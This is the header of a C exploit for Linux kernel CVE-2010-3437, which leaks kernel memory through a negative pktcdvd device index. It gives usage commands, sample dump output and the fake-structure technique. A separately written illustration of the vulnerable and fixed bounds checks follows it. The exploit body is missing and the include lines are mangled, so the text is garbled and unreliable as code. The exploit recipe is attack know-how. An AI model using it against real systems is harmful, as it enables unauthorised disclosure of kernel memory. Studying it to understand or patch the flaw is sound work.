/*
* cve-2010-3437.c
*
* Linux Kernel <>
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* https://bugzilla.redhat.com/show_bug.cgi?id=638085
*
* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
* pktcdvd_device from the global pkt_devs array. The index into this
* array is provided directly by the user and is a signed integer, so the
* comparison to ensure that it falls within the bounds of this array will
* fail when provided with a negative index.
*
* Usage:
*
* $ gcc cve-2010-3437.c -o cve-2010-3437
* $ ./cve-2010-3437
* usage: ./cve-2010-3437
* $ ./cve-2010-3437 0xc0102290 64
* [+] searching for pkt_devs kernel symbol...
* [+] found pkt_devs at 0xc086fcc0
* [+] opening pktcdvd device...
* [+] calculated dereference address of 0x790070c0
* [+] mapping page at 0x79007000 for pktcdvd_device dereference...
* [+] setting up fake pktcdvd_device structure...
* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
* [+] dumping kmem to output...
*
* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
*
* Notes:
*
* Pass the desired kernel memory address and dump length as arguments.
*
* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by
* specifying a large negative device index, causing the kernel to
* dereference to our fake pktcdvd_device structure in userspace and copy
* data to userspace from an attacker-controlled address. Since only 4
* bytes of kmem are disclosed per ioctl call, large dump sizes may take a
* few seconds.
*
* Tested on Ubuntu Lucid 10.04. 32-bit only for now.
*/
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include
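As an added illustration (not code from this exploit or from the kernel), the signed-index bounds check the header describes, modelled in plain C beside a hardened form, plus the slot arithmetic that shows why a negative index into pkt_devs lands in user space on a 32-bit kernel. MAX_WRITERS, the 4-byte pointer size and the index value are assumptions chosen for the illustration; the pkt_devs address is the one from the usage output above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed table size and pointer width for a 32-bit kernel (illustration only). */
#define MAX_WRITERS 8
#define PTR_SIZE 4u

/* Vulnerable bounds check: the index arrives from the user as a signed int
 * and only the upper bound is tested, so every negative value is accepted. */
bool vulnerable_index_ok(int dev_index)
{
    return dev_index < MAX_WRITERS;
}

/* Hardened check: view the value as unsigned so a single comparison rejects
 * both too-large indices and all negative ones (the classic fix pattern). */
bool fixed_index_ok(int dev_index)
{
    return (unsigned int)dev_index < MAX_WRITERS;
}

/* Address the kernel would read for pkt_devs[dev_index] on a 32-bit system.
 * Arithmetic is done in uint32_t so the wraparound is well defined and
 * mirrors what the kernel's pointer arithmetic produces. */
uint32_t pkt_devs_slot_addr(uint32_t pkt_devs_base, int dev_index)
{
    return pkt_devs_base + (uint32_t)dev_index * PTR_SIZE;
}

int main(void)
{
    const uint32_t pkt_devs = 0xc086fcc0u; /* symbol address from the usage output */
    const int idx = -0x11e1a300;           /* constructed index that lands on 0x790070c0 */
    uint32_t slot = pkt_devs_slot_addr(pkt_devs, idx);

    printf("index %d: vulnerable check %s, fixed check %s\n", idx,
           vulnerable_index_ok(idx) ? "accepts" : "rejects",
           fixed_index_ok(idx) ? "accepts" : "rejects");
    printf("pkt_devs[%d] is read from 0x%08x, below the 3G kernel split\n", idx, slot);
    return 0;
}
```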